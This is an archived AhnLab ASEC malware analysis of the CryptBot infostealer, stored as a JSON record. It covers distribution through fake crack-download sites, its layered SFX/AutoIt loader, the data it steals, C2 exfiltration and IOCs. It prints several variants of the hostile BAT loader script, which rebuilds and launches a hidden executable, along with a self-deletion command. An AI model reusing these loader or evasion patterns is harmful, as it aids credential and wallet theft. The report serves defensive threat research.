{
	"id": "01075449-386c-497e-998a-3c033ad82b57",
	"created_at": "2026-04-06T00:13:35.20355Z",
	"updated_at": "2026-04-10T13:11:56.920709Z",
	"deleted_at": null,
	"sha1_hash": "7f50ac5f1888c6ca5a06ed1945b9b80e1f26cafb",
	"title": "CryptBot Infostealer Constantly Changing and Being Distributed - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 950378,
	"plain_text": "CryptBot Infostealer Constantly Changing and Being Distributed -\r\nASEC\r\nBy ATCP\r\nPublished: 2021-07-29 · Archived: 2026-04-05 17:02:26 UTC\r\nCryptBot is an Infostealer that is being distributed through malicious websites disguised as software download\r\npages. Because there are multiple malicious websites created and many of them appear on the top page when\r\nkeywords such as cracks and serials of popular commercial software are entered in search engines, many users are\r\nsubject to download the malware and run it. In addition, the sample uses the SFX packing, making difficult to\r\ndistinguish between normal and malicious files, and changes occur multiple times a day.\r\nSince the websites disguise themselves as download pages, users are convinced by the seemingly normal file\r\nrunning malware multiple times even when V3 products block it, which requires users’ extra caution. AhnLab has\r\nbeen continually making blog posts about aiming to raise people’s awareness of its danger.\r\nhttps://asec.ahnlab.com/en/26052/\r\nPage 1 of 10\n\nFigure 1. Sample of CryptBot distribution website\r\nCryptBot Infostealer Being Distributed in Different Forms\r\nCryptBot Infostealer Distributed Through Phishing Sites\r\nAs shown in the figure below, the malware is compressed into many layers. The final compressed file has a txt file\r\nthat contains password.\r\nhttps://asec.ahnlab.com/en/26052/\r\nPage 2 of 10\n\nFigure 2. Compressed file downloaded from malicious website\r\nWhen the malware is run, it creates folder names such as 7z.SFX.xxx and IXPxxx.TMP in the %temp% path and\r\nfiles necessary for the infection in the folder. Filenames and extensions vary for every change. The created files\r\nare as follows.\r\nFigure 3. Dropped files\r\nBAT script (Far.vsdx)\r\nAutoit script (Impedire.vsdx)\r\nEncrypted CryptBot binary (Vento.vsdx)\r\nAutoit executable (Copre.vsdx)\r\nThe malware runs the BAT script after creating files. See below for the structure of the script.\r\nhttps://asec.ahnlab.com/en/26052/\r\nPage 3 of 10\n\nFigure 4. BAT script\r\nOne thing to note about the script is that it changes periodically. As it can be easily changed, the attacker alters the\r\npattern by slightly modifying the grammar while maintaining its features. The following table shows the date of\r\nBAT script changes in CryptBot samples that were collected for about a month. As shown below, the change cycle\r\nhas become shorter.\r\nConfronto.jar  June 16th, 2021\r\nAprile.accdr  July 6th, 2021\r\nVirtuoso.bmp  July 16th, 2021\r\nOrti.html  July 17th, 2021\r\nPensai.wmz  July 21st, 2021\r\nLume.eml  July 22nd, 2021\r\nRitroverai.aiff  July 23rd, 2021\r\nPovera.ppsm  July 24th, 2021\r\nIdeale.dotx  July 25th, 2021\r\nAffonda.wms  July 26th, 2021\r\nEsaltavano.tiff  July 28th, 2021\r\nTable 1. Date of changes\r\nThe following table shows the main changes. As shown below, while the feature of the BAT script itself did not\r\nchange, the grammar or environment variable used has changed slightly.\r\nAprile.accdr\r\nif %userdomain%==DESKTOP-QO5QU33 exit 2\r\n\u003cnul set /p = “MZ”\u003e Ripreso.exe.com\r\nfindstr /V /R “^AGbW…xiSv$” Fianco.accdr \u003e\u003e Ripreso.exe.com”\r\ncopy Fra.accdr B\r\nstart Ripreso.exe.com B\r\nping 127.0.0.1 -n 30\r\nVirtuoso.bmp\r\nhttps://asec.ahnlab.com/en/26052/\r\nPage 4 of 10\n\nSet PRehIgqfWNWhFAxNgjgzQhcGBgikLpocQQTp=DESKTOP-Set zVqJPft=QO5QU33\r\nSet bizASaCEemlwdhJhU=MZ\r\nif %userdomain%==%PRehIgqfWNWhFAxNgjgzQhcGBgikLpocQQTp% exit 8\r\n\u003cnul set /p = “%bizASaCEemlwdhJhU%“\u003e Compatto.exe.com\r\nfindstr /V /R “^viIO…hWwHg$” Baciandola.bmp \u003e\u003e Compatto.exe.com”\r\ncopy Corano.bmp w\r\nstart Compatto.exe.com w\r\nping 127.0.0.1 -n 30\r\nLume.eml\r\necho XrHAkUeB\r\necho XrHAkUeB\r\nif %userdomain%==DESKTOP-QO5QU33 exit 2\r\n\u003cnul set /p = “MZ”\u003e Mese.exe.com\r\nfindstr /V /R “^VtHMWSo…DuPlDDuA$” Giorni.eml \u003e\u003e Mese.exe.com”\r\ncopy Scossa.eml h\r\nstart Mese.exe.com h\r\nping 127.0.0.1 -n 30\r\nEsaltavano.tiff\r\nSet PaWlwDiebzBsRrpYjIjVHC=DESKTOP-Set hQfTrWvlasdWKZ=QO5QU33\r\nif %computername%==%PaWlwDiebzBsRrpYjIjVHC% exit\r\nSet OzhMvyIxp=MZ\r\n\u003cnul set /p = “%OzhMvyIxp%” \u003e Hai.exe.com\r\nfindstr /V /R “^fqCO…pHiJlm$” Affettuosa.tiff \u003e\u003e Hai.exe.com”\r\ncopy Saluta.tiff S\r\nstart Hai.exe.com S\r\nping localhost -n 30\r\nTable 2. Changed content\r\nWhen the BAT script is executed, it copies the Autoit executable with the filename [random name].exe.com. It\r\nthen copies the Autoit script with a certain filename and gives the script as an argument to run the file.\r\nhttps://asec.ahnlab.com/en/26052/\r\nPage 5 of 10\n\nFigure 5. Executed Autoit process\r\nThe Autoit script decrypts the encrypted binary to copy it to the virtual memory area and run it.\r\nFigure 6. Decrypted CryptBot malware binary\r\nWhen the CryptBot binary loaded in the memory is executed, it scans for directories of certain anti-malware\r\nproducts. When the directory exists, the binary generates a random number and performs Sleep for that amount. It\r\nis assumed that delay execution is done to bypass detection.\r\nFigure 7. Scan code for directories of anti-malware products\r\nThe code then scans for the existence of a particular directory. If the directory already exists, the script considers\r\neither a duplicate execution or an already infected system, and self-deletes after termination. The name of the\r\ndirectory differs for each sample.\r\nhttps://asec.ahnlab.com/en/26052/\r\nPage 6 of 10\n\nFigure 8. Duplicate execution scan\r\nWhen performing self-deletion, the script runs the following cmd command through the ShellExecuteW function.\r\n/c rd /s /q %Temp%\\[name of the created directory] \u0026 timeout 2 \u0026 del /f /q “[malware execution\r\npath]”\r\nTable 3. Command for self-deletion\r\nWhen the malware begins its malicious behaviors, it creates a random directory in %TEMP% and collects various\r\nuser information. The following shows the information collected by the sample.\r\nBrowser Information (Chrome, Firefox, and Opera)\r\nCookie\r\nSaved form data\r\nSaved account names and passwords\r\nCryptocurrency wallet information\r\nSystem info\r\nName of executed sample\r\nOS and Country information\r\nUser account and PC name\r\nHardware information\r\nList of installed programs\r\nScreenshots\r\nhttps://asec.ahnlab.com/en/26052/\r\nPage 7 of 10\n\nFigure 9. Collected data of accounts and passwords saved in browsers\r\nFigure 10. Collected data of system info\r\nWhen information collection is complete, everything in the created directory is compressed into a ZIP file with a\r\npassword and sent to C2. The .top domain which changes often is mainly used for the C2 URL. For a CryptBot\r\nmalware sample, there are usually 3 C2s in total: 2 for sending information and 1 for downloading additional\r\nmalware.\r\nhttps://asec.ahnlab.com/en/26052/\r\nPage 8 of 10\n\nFigure 11. C2 Transmission Code\r\nWhen the C2 transmission process is complete, the malware accesses a particular URL and runs additional\r\nmalware after downloading it. ClipBanker types are usually downloaded.\r\nFigure 12. Code for downloading and running additional malware\r\nIf the system is infected by this malware, confidential information such as account names, passwords, and\r\ncryptocurrency wallets is leaked. It is highly likely that there will be secondary damages exploiting the leaked\r\ninformation, users need to take caution.\r\nAhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:\r\nTrojan/Win.CryptLoader.XM122\r\nTrojan/BAT.CryptLoader.S1612\r\nTrojan/BAT.CryptLoader.S1610\r\nWin-Trojan/MalPeP.mexp\r\nMD5\r\n58774ece556b0a1e01443ea1c3c68e5a\r\nc2bc3bef415ae0ed2e89cb864fff2bfc\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//ewais32[.]top/index[.]php\r\nhttp[:]//gurswj04[.]top/download[.]php?file=lv[.]exe\r\nhttp[:]//morers03[.]top/index[.]php\r\nhttp[:]//morxeg03[.]top/index[.]php\r\nhttp[:]//smaxgr31[.]top/index[.]php\r\nhttps://asec.ahnlab.com/en/26052/\r\nPage 9 of 10\n\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/26052/\r\nhttps://asec.ahnlab.com/en/26052/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://asec.ahnlab.com/en/26052/"
	],
	"report_names": [
		"26052"
	],
	"threat_actors": [],
	"ts_created_at": 1775434415,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7f50ac5f1888c6ca5a06ed1945b9b80e1f26cafb.pdf",
		"text": "https://archive.orkl.eu/7f50ac5f1888c6ca5a06ed1945b9b80e1f26cafb.txt",
		"img": "https://archive.orkl.eu/7f50ac5f1888c6ca5a06ed1945b9b80e1f26cafb.jpg"
	}
}